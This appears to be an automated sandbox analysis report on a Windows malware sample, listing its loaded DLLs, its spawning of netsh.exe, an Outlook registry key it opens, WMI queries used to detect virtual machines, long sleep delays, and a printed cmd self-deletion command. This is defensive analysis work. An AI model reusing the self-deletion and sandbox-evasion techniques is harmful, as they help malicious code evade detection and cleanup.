Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: 0xE7D68599 [Fri Apr 3 11:16:41 2093 UTC]

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF848E73FBB push ebx; iretd	0_2_00007FF848E7400A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF848E600BD pushad ; iretd	0_2_00007FF848E600C1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF848E7403D push ebx; iretd	0_2_00007FF848E7400A

Hooking and other Techniques for Hiding and Protection

Self deletion via cmd or bat file

Source: C:\Users\user\Desktop\file.exe	Process created: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\Desktop\file.exe"			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE DriveType = 3

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\file.exe	Memory allocated: 2067C1F0000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 2067DD90000 memory reserve \| memory write watch			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 598684	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 598570	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 598401	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Window / User API: threadDelayed 1840			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window / User API: threadDelayed 2550			Jump to behavior

Source: C:\Users\user\Desktop\file.exe TID: 4672	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4672	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4672	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4672	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4672	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4672	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4672	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4672	Thread sleep time: -599343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4672	Thread sleep time: -599234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4672	Thread sleep time: -599125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4672	Thread sleep time: -599015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4672	Thread sleep time: -598906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4672	Thread sleep time: -598797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4672	Thread sleep time: -598684s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4672	Thread sleep time: -598570s >= -30000s	Jump to behavior
